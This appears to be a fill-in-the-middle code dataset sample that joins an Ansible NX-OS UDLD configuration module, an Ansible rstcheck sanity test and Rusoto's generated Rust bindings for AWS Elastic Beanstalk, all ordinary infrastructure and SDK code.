None: S = list() S.append(configobj) for child in configobj.children: if child in S: continue self.expand_section(child, S) return S def get_object(self, path): for item in self.items: if 
item.text == path[-1]: parents = [p.text for p in item.parents] if parents == path[:-1]: return item def to_block(self, section): return '\n'.join([item.raw for item in section]) def get_section(self, path): try: section = self.get_section_objects(path) return self.to_block(section) except ValueError: return list() def get_section_objects(self, path): if not isinstance(path, list): path = [path] obj = self.get_object(path) if not obj: raise ValueError('path does not exist in config') return self.expand_section(obj) def add(self, lines, parents=None): """Adds one or lines of configuration """ ancestors = list() offset = 0 obj = None ## global config command if not parents: for line in to_list(lines): item = ConfigLine(line) item.raw = line if item not in self.items: self.items.append(item) else: for index, p in enumerate(parents): try: i = index + 1 obj = self.get_section_objects(parents[:i])[0] ancestors.append(obj) except ValueError: # add parent to config offset = index * self.indent obj = ConfigLine(p) obj.raw = p.rjust(len(p) + offset) if ancestors: obj.parents = list(ancestors) ancestors[-1].children.append(obj) self.items.append(obj) ancestors.append(obj) # add child objects for line in to_list(lines): # check if child already exists for child in ancestors[-1].children: if child.text == line: break else: offset = len(parents) * self.indent item = ConfigLine(line) item.raw = line.rjust(len(line) + offset) item.parents = ancestors ancestors[-1].children.append(item) self.items.append(item) def get_network_module(**kwargs): try: return get_module(**kwargs) except NameError: return NetworkModule(**kwargs) def get_config(module, include_defaults=False): config = module.params['config'] if not config: try: config = module.get_config() except AttributeError: defaults = module.params['include_defaults'] config = module.config.get_config(include_defaults=defaults) return CustomNetworkConfig(indent=2, contents=config) def load_config(module, candidate): config = get_config(module) commands = candidate.difference(config) commands = [str(c).strip() for c in commands] save_config = module.params['save'] result = dict(changed=False) if commands: if not module.check_mode: try: module.configure(commands) except AttributeError: module.config(commands) if save_config: try: module.config.save_config() except AttributeError: module.execute(['copy running-config startup-config']) result['changed'] = True result['updates'] = commands return result # END OF COMMON CODE def execute_config_command(commands, module): try: module.configure(commands) except ShellError: clie = get_exception() module.fail_json(msg='Error sending CLI commands', error=str(clie), commands=commands) except AttributeError: try: commands.insert(0, 'configure') module.cli.add_commands(commands, output='config') module.cli.run_commands() except ShellError: clie = get_exception() module.fail_json(msg='Error sending CLI commands', error=str(clie), commands=commands) def get_cli_body_ssh(command, response, module): """Get response for when transport=cli. This is kind of a hack and mainly needed because these modules were originally written for NX-API. And not every command supports "| json" when using cli/ssh. As such, we assume if | json returns an XML string, it is a valid command, but that the resource doesn't exist yet. Instead, the output will be a raw string when issuing commands containing 'show run'. 
""" if 'xml' in response[0] or response[0] == '\n': body = [] elif 'show run' in command: body = response else: try: body = [json.loads(response[0])] except ValueError: module.fail_json(msg='Command does not support JSON output', command=command) return body def execute_show(cmds, module, command_type=None): command_type_map = { 'cli_show': 'json', 'cli_show_ascii': 'text' } try: if command_type: response = module.execute(cmds, command_type=command_type) else: response = module.execute(cmds) except ShellError: clie = get_exception() module.fail_json(msg='Error sending {0}'.format(cmds), error=str(clie)) except AttributeError: try: if command_type: command_type = command_type_map.get(command_type) module.cli.add_commands(cmds, output=command_type) response = module.cli.run_commands() else: module.cli.add_commands(cmds, raw=True) response = module.cli.run_commands() except ShellError: clie = get_exception() module.fail_json(msg='Error sending {0}'.format(cmds), error=str(clie)) return response def execute_show_command(command, module, command_type='cli_show'): if module.params['transport'] == 'cli': if 'show run' not in command: command += ' | json' cmds = [command] response = execute_show(cmds, module) body = get_cli_body_ssh(command, response, module) elif module.params['transport'] == 'nxapi': cmds = [command] body = execute_show(cmds, module, command_type=command_type) return body def flatten_list(command_lists): flat_command_list = [] for command in command_lists: if isinstance(command, list): flat_command_list.extend(command) else: flat_command_list.append(command) return flat_command_list def get_udld_interface(module, interface): command = 'show udld {0}'.format(interface) interface_udld = {} mode = None try: body = execute_show_command(command, module)[0] table = body['TABLE_interface']['ROW_interface'] status = str(table.get('mib-port-status', None)) # Note: 'mib-aggresive-mode' is NOT a typo agg = str(table.get('mib-aggresive-mode', 'disabled')) if agg == 'enabled': mode = 'aggressive' else: mode = status interface_udld['mode'] = mode except (KeyError, AttributeError, IndexError): interface_udld = {} return interface_udld def is_interface_copper(module, interface): command = 'show interface status' copper = [] try: body = execute_show_command(command, module)[0] table = body['TABLE_interface']['ROW_interface'] for each in table: itype = each.get('type', 'DNE') if 'CU' in itype or '1000' in itype or '10GBaseT' in itype: copper.append(str(each['interface'].lower())) except (KeyError, AttributeError): pass if interface in copper: found = True else: found = False return found def get_commands_config_udld_interface(delta, interface, module, existing): commands = [] copper = is_interface_copper(module, interface) if delta: mode = delta['mode'] if mode == 'aggressive': command = 'udld aggressive' elif copper: if mode == 'enabled': if existing['mode'] == 'aggressive': command = 'no udld aggressive ; udld enable' else: command = 'udld enable' elif mode == 'disabled': command = 'no udld enable' elif not copper: if mode == 'enabled': if existing['mode'] == 'aggressive': command = 'no udld aggressive ; no udld disable' else: command = 'no udld disable' elif mode == 'disabled': command = 'udld disable' if command: commands.append(command) commands.insert(0, 'interface {0}'.format(interface)) return commands def get_commands_remove_udld_interface(delta, interface, module, existing): commands = [] copper = is_interface_copper(module, interface) if delta: mode = delta['mode'] if mode == 
'aggressive': command = 'no udld aggressive' elif copper: if mode == 'enabled': command = 'no udld enable' elif mode == 'disabled': command = 'udld enable' elif not copper: if mode == 'enabled': command = 'udld disable' elif mode == 'disabled': command = 'no udld disable' if command: commands.append(command) commands.insert(0, 'interface {0}'.format(interface)) return commands def main(): argument_spec = dict( mode=dict(choices=['enabled', 'disabled', 'aggressive'], required=True), interface=dict(type='str', required=True), state=dict(choices=['absent', 'present'], default='present'), ) module = get_network_module(argument_spec=argument_spec, supports_check_mode=True) interface = module.params['interface'].lower() mode = module.params['mode'] state = module.params['state'] proposed = dict(mode=mode) existing = get_udld_interface(module, interface) end_state = existing delta = dict(set(proposed.iteritems()).difference(existing.iteritems())) changed = False commands = [] if state == 'present': if delta: command = get_commands_config_udld_interface(delta, interface, module, existing) commands.append(command) elif state == 'absent': common = set(proposed.iteritems()).intersection(existing.iteritems()) if common: command = get_commands_remove_udld_interface( dict(common), interface, module, existing ) commands.append(command) cmds = flatten_list(commands) if cmds: if module.check_mode: module.exit_json(changed=True, commands=cmds) else: changed = True execute_config_command(cmds, module) end_state = get_udld_interface(module, interface) if 'configure' in cmds: cmds.pop(0) results = {} results['proposed'] = proposed results['existing'] = existing results['end_state'] = end_state results['updates'] = cmds results['changed'] = changed module.exit_json(**results) if __name__ == '__main__': main()<|fim▁end|>
interface: Ethernet1/1 mode: enabled
<|file_name|>rstcheck.py<|end_file_name|><|fim▁begin|>"""Sanity test using rstcheck.""" from __future__ import absolute_import, print_function import os from lib.sanity import ( SanitySingleVersion, SanityMessage, SanityFailure, SanitySuccess, SanitySkipped, ) from lib.util import ( SubprocessError, run_command, parse_to_dict, find_executable, ) from lib.config import ( SanityConfig, ) class RstcheckTest(SanitySingleVersion): """Sanity test using rstcheck.""" def test(self, args, targets): """ :type args: SanityConfig :type targets: SanityTargets :rtype: SanityResult """ with open('test/sanity/rstcheck/ignore-substitutions.txt', 'r') as ignore_fd: ignore_substitutions = sorted(set(ignore_fd.read().splitlines())) paths = sorted(i.path for i in targets.include if os.path.splitext(i.path)[1] in ('.rst',)) if not paths: return SanitySkipped(self.name) cmd = [ 'python%s' % args.python_version, find_executable('rstcheck'), '--report', 'warning', '--ignore-substitutions', ','.join(ignore_substitutions), ] + paths try: stdout, stderr = run_command(args, cmd, capture=True) status = 0 except SubprocessError as ex: stdout = ex.stdout stderr = ex.stderr status = ex.status if stdout: raise SubprocessError(cmd=cmd, status=status, stderr=stderr, stdout=stdout) if args.explain: return SanitySuccess(self.name) pattern = r'^(?P<path>[^:]*):(?P<line>[0-9]+): \((?P<level>INFO|WARNING|ERROR|SEVERE)/[0-4]\) (?P<message>.*)$' results = [parse_to_dict(pattern, line) for line in stderr.splitlines()] results = [SanityMessage( message=r['message'], path=r['path'],<|fim▁hole|> level=r['level'], ) for r in results] if results: return SanityFailure(self.name, messages=results) return SanitySuccess(self.name)<|fim▁end|>
line=int(r['line']), column=0,
<|file_name|>generated.rs<|end_file_name|><|fim▁begin|>#[allow(warnings)] use hyper::Client; use hyper::status::StatusCode; use rusoto_core::request::DispatchSignedRequest; use rusoto_core::region; use std::fmt; use std::error::Error; use rusoto_core::request::HttpDispatchError; use rusoto_core::credential::{CredentialsError, ProvideAwsCredentials}; use std::str::FromStr; use xml::EventReader; use xml::reader::ParserConfig; use rusoto_core::param::{Params, ServiceParams}; use rusoto_core::signature::SignedRequest; use xml::reader::XmlEvent; use rusoto_core::xmlutil::{Next, Peek, XmlParseError, XmlResponse}; use rusoto_core::xmlutil::{characters, end_element, start_element, skip_tree, peek_at_name}; use rusoto_core::xmlerror::*; enum DeserializerNext { Close, Skip, Element(String), } #[doc="<p/>"] #[derive(Default,Debug,Clone)] pub struct AbortEnvironmentUpdateMessage { #[doc="<p>This specifies the ID of the environment with the in-progress update that you want to cancel.</p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>This specifies the name of the environment with the in-progress update that you want to cancel.</p>"] pub environment_name: Option<EnvironmentName>, } /// Serialize `AbortEnvironmentUpdateMessage` contents to a `SignedRequest`. struct AbortEnvironmentUpdateMessageSerializer; impl AbortEnvironmentUpdateMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &AbortEnvironmentUpdateMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } } } pub type AbortableOperationInProgress = bool; struct AbortableOperationInProgressDeserializer; impl AbortableOperationInProgressDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<AbortableOperationInProgress, XmlParseError> { try!(start_element(tag_name, stack)); let obj = bool::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ActionHistoryStatus = String; struct ActionHistoryStatusDeserializer; impl ActionHistoryStatusDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ActionHistoryStatus, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ActionStatus = String; struct ActionStatusDeserializer; impl ActionStatusDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ActionStatus, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ActionType = String; struct ActionTypeDeserializer; impl ActionTypeDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ActionType, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the properties of an application.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationDescription { #[doc="<p>The name of the application.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>The names of the 
configuration templates associated with this application.</p>"] pub configuration_templates: Option<ConfigurationTemplateNamesList>, #[doc="<p>The date when the application was created.</p>"] pub date_created: Option<CreationDate>, #[doc="<p>The date when the application was last modified.</p>"] pub date_updated: Option<UpdateDate>, #[doc="<p>User-defined description of the application.</p>"] pub description: Option<Description>, #[doc="<p>The lifecycle settings for the application.</p>"] pub resource_lifecycle_config: Option<ApplicationResourceLifecycleConfig>, #[doc="<p>The names of the versions for this application.</p>"] pub versions: Option<VersionLabelsList>, } struct ApplicationDescriptionDeserializer; impl ApplicationDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ApplicationName" => { obj.application_name = Some(try!(ApplicationNameDeserializer::deserialize("ApplicationName", stack))); } "ConfigurationTemplates" => { obj.configuration_templates = Some(try!(ConfigurationTemplateNamesListDeserializer::deserialize("ConfigurationTemplates", stack))); } "DateCreated" => { obj.date_created = Some(try!(CreationDateDeserializer::deserialize("DateCreated", stack))); } "DateUpdated" => { obj.date_updated = Some(try!(UpdateDateDeserializer::deserialize("DateUpdated", stack))); } "Description" => { obj.description = Some(try!(DescriptionDeserializer::deserialize("Description", stack))); } "ResourceLifecycleConfig" => { obj.resource_lifecycle_config = Some(try!(ApplicationResourceLifecycleConfigDeserializer::deserialize("ResourceLifecycleConfig", stack))); } "Versions" => { obj.versions = Some(try!(VersionLabelsListDeserializer::deserialize("Versions", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type ApplicationDescriptionList = Vec<ApplicationDescription>; struct ApplicationDescriptionListDeserializer; impl ApplicationDescriptionListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationDescriptionList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. 
})) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ApplicationDescriptionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>Result message containing a single description of an application.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationDescriptionMessage { #[doc="<p> The <a>ApplicationDescription</a> of the application. </p>"] pub application: Option<ApplicationDescription>, } struct ApplicationDescriptionMessageDeserializer; impl ApplicationDescriptionMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationDescriptionMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationDescriptionMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Application" => { obj.application = Some(try!(ApplicationDescriptionDeserializer::deserialize("Application", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Result message containing a list of application descriptions.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationDescriptionsMessage { #[doc="<p>This parameter contains a list of <a>ApplicationDescription</a>.</p>"] pub applications: Option<ApplicationDescriptionList>, } struct ApplicationDescriptionsMessageDeserializer; impl ApplicationDescriptionsMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationDescriptionsMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationDescriptionsMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Applications" => { obj.applications = Some(try!(ApplicationDescriptionListDeserializer::deserialize("Applications", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Application request metrics for an AWS Elastic Beanstalk environment.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationMetrics { #[doc="<p>The amount of time that the metrics cover (usually 10 seconds). For example, you might have 5 requests (<code>request_count</code>) within the most recent time slice of 10 seconds (<code>duration</code>).</p>"] pub duration: Option<NullableInteger>, #[doc="<p>Represents the average latency for the slowest X percent of requests over the last 10 seconds. 
Latencies are in seconds with one millisecond resolution.</p>"] pub latency: Option<Latency>, #[doc="<p>Average number of requests handled by the web server per second over the last 10 seconds.</p>"] pub request_count: Option<RequestCount>, #[doc="<p>Represents the percentage of requests over the last 10 seconds that resulted in each type of status code response.</p>"] pub status_codes: Option<StatusCodes>, } struct ApplicationMetricsDeserializer; impl ApplicationMetricsDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationMetrics, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationMetrics::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Duration" => { obj.duration = Some(try!(NullableIntegerDeserializer::deserialize("Duration", stack))); } "Latency" => { obj.latency = Some(try!(LatencyDeserializer::deserialize("Latency", stack))); } "RequestCount" => { obj.request_count = Some(try!(RequestCountDeserializer::deserialize("RequestCount", stack))); } "StatusCodes" => { obj.status_codes = Some(try!(StatusCodesDeserializer::deserialize("StatusCodes", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type ApplicationName = String; struct ApplicationNameDeserializer; impl ApplicationNameDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationName, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ApplicationNamesList = Vec<ApplicationName>; /// Serialize `ApplicationNamesList` contents to a `SignedRequest`. struct ApplicationNamesListSerializer; impl ApplicationNamesListSerializer { fn serialize(params: &mut Params, name: &str, obj: &ApplicationNamesList) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); params.put(&key, &obj); } } } #[doc="<p>The resource lifecycle configuration for an application. Defines lifecycle settings for resources that belong to the application, and the service role that Elastic Beanstalk assumes in order to apply lifecycle settings. The version lifecycle configuration defines lifecycle settings for application versions.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationResourceLifecycleConfig { #[doc="<p>The ARN of an IAM service role that Elastic Beanstalk has permission to assume.</p>"] pub service_role: Option<String>, #[doc="<p>The application version lifecycle configuration.</p>"] pub version_lifecycle_config: Option<ApplicationVersionLifecycleConfig>, } struct ApplicationResourceLifecycleConfigDeserializer; impl ApplicationResourceLifecycleConfigDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationResourceLifecycleConfig, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationResourceLifecycleConfig::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, ..
})) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ServiceRole" => { obj.service_role = Some(try!(StringDeserializer::deserialize("ServiceRole", stack))); } "VersionLifecycleConfig" => { obj.version_lifecycle_config = Some(try!(ApplicationVersionLifecycleConfigDeserializer::deserialize("VersionLifecycleConfig", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } /// Serialize `ApplicationResourceLifecycleConfig` contents to a `SignedRequest`. struct ApplicationResourceLifecycleConfigSerializer; impl ApplicationResourceLifecycleConfigSerializer { fn serialize(params: &mut Params, name: &str, obj: &ApplicationResourceLifecycleConfig) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.service_role { params.put(&format!("{}{}", prefix, "ServiceRole"), &field_value); } if let Some(ref field_value) = obj.version_lifecycle_config { ApplicationVersionLifecycleConfigSerializer::serialize( params, &format!("{}{}", prefix, "VersionLifecycleConfig"), field_value, ); } } } #[derive(Default,Debug,Clone)] pub struct ApplicationResourceLifecycleDescriptionMessage { #[doc="<p>The name of the application.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>The lifecycle configuration.</p>"] pub resource_lifecycle_config: Option<ApplicationResourceLifecycleConfig>, } struct ApplicationResourceLifecycleDescriptionMessageDeserializer; impl ApplicationResourceLifecycleDescriptionMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationResourceLifecycleDescriptionMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationResourceLifecycleDescriptionMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
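// Every generated deserializer in this file follows the same event protocol:
// peek at the next XML event without consuming it, map an EndElement to Close
// (breaking the loop so `end_element` below can consume the closing tag), map
// a StartElement to Element(local_name) for dispatch, and Skip anything else
// (character data, whitespace) by advancing the stack. The match that follows
// dispatches on the child element's local name; unrecognized children are
// discarded wholesale via `skip_tree`, so unexpected response fields cannot
// derail parsing.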
{ "ApplicationName" => { obj.application_name = Some(try!(ApplicationNameDeserializer::deserialize("ApplicationName", stack))); } "ResourceLifecycleConfig" => { obj.resource_lifecycle_config = Some(try!(ApplicationResourceLifecycleConfigDeserializer::deserialize("ResourceLifecycleConfig", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the properties of an application version.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationVersionDescription { #[doc="<p>The name of the application to which the application version belongs.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>Reference to the artifact from the AWS CodeBuild build.</p>"] pub build_arn: Option<String>, #[doc="<p>The creation date of the application version.</p>"] pub date_created: Option<CreationDate>, #[doc="<p>The last modified date of the application version.</p>"] pub date_updated: Option<UpdateDate>, #[doc="<p>The description of the application version.</p>"] pub description: Option<Description>, #[doc="<p>If the version's source code was retrieved from AWS CodeCommit, the location of the source code for the application version.</p>"] pub source_build_information: Option<SourceBuildInformation>, #[doc="<p>The storage location of the application version's source bundle in Amazon S3.</p>"] pub source_bundle: Option<S3Location>, #[doc="<p>The processing status of the application version.</p>"] pub status: Option<ApplicationVersionStatus>, #[doc="<p>A unique identifier for the application version.</p>"] pub version_label: Option<VersionLabel>, } struct ApplicationVersionDescriptionDeserializer; impl ApplicationVersionDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationVersionDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationVersionDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "ApplicationName" => { obj.application_name = Some(try!(ApplicationNameDeserializer::deserialize("ApplicationName", stack))); } "BuildArn" => { obj.build_arn = Some(try!(StringDeserializer::deserialize("BuildArn", stack))); } "DateCreated" => { obj.date_created = Some(try!(CreationDateDeserializer::deserialize("DateCreated", stack))); } "DateUpdated" => { obj.date_updated = Some(try!(UpdateDateDeserializer::deserialize("DateUpdated", stack))); } "Description" => { obj.description = Some(try!(DescriptionDeserializer::deserialize("Description", stack))); } "SourceBuildInformation" => { obj.source_build_information = Some(try!(SourceBuildInformationDeserializer::deserialize("SourceBuildInformation", stack))); } "SourceBundle" => { obj.source_bundle = Some(try!(S3LocationDeserializer::deserialize("SourceBundle", stack))); } "Status" => { obj.status = Some(try!(ApplicationVersionStatusDeserializer::deserialize("Status", stack))); } "VersionLabel" => { obj.version_label = Some(try!(VersionLabelDeserializer::deserialize("VersionLabel", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type ApplicationVersionDescriptionList = Vec<ApplicationVersionDescription>; struct ApplicationVersionDescriptionListDeserializer; impl ApplicationVersionDescriptionListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationVersionDescriptionList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ApplicationVersionDescriptionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>Result message wrapping a single description of an application version.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationVersionDescriptionMessage { #[doc="<p> The <a>ApplicationVersionDescription</a> of the application version. </p>"] pub application_version: Option<ApplicationVersionDescription>, } struct ApplicationVersionDescriptionMessageDeserializer; impl ApplicationVersionDescriptionMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationVersionDescriptionMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationVersionDescriptionMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "ApplicationVersion" => { obj.application_version = Some(try!(ApplicationVersionDescriptionDeserializer::deserialize("ApplicationVersion", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Result message wrapping a list of application version descriptions.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationVersionDescriptionsMessage { #[doc="<p>List of <code>ApplicationVersionDescription</code> objects sorted in order of creation.</p>"] pub application_versions: Option<ApplicationVersionDescriptionList>, #[doc="<p>For a paginated request, the token that you can pass in a subsequent request to get the next page.</p>"] pub next_token: Option<Token>, } struct ApplicationVersionDescriptionsMessageDeserializer; impl ApplicationVersionDescriptionsMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationVersionDescriptionsMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationVersionDescriptionsMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ApplicationVersions" => { obj.application_versions = Some(try!(ApplicationVersionDescriptionListDeserializer::deserialize("ApplicationVersions", stack))); } "NextToken" => { obj.next_token = Some(try!(TokenDeserializer::deserialize("NextToken", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>The application version lifecycle settings for an application. Defines the rules that Elastic Beanstalk applies to an application's versions in order to avoid hitting the per-region limit for application versions.</p> <p>When Elastic Beanstalk deletes an application version from its database, you can no longer deploy that version to an environment. The source bundle remains in S3 unless you configure the rule to delete it.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplicationVersionLifecycleConfig { #[doc="<p>Specify a max age rule to restrict the length of time that application versions are retained for an application.</p>"] pub max_age_rule: Option<MaxAgeRule>, #[doc="<p>Specify a max count rule to restrict the number of application versions that are retained for an application.</p>"] pub max_count_rule: Option<MaxCountRule>, } struct ApplicationVersionLifecycleConfigDeserializer; impl ApplicationVersionLifecycleConfigDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationVersionLifecycleConfig, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplicationVersionLifecycleConfig::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => 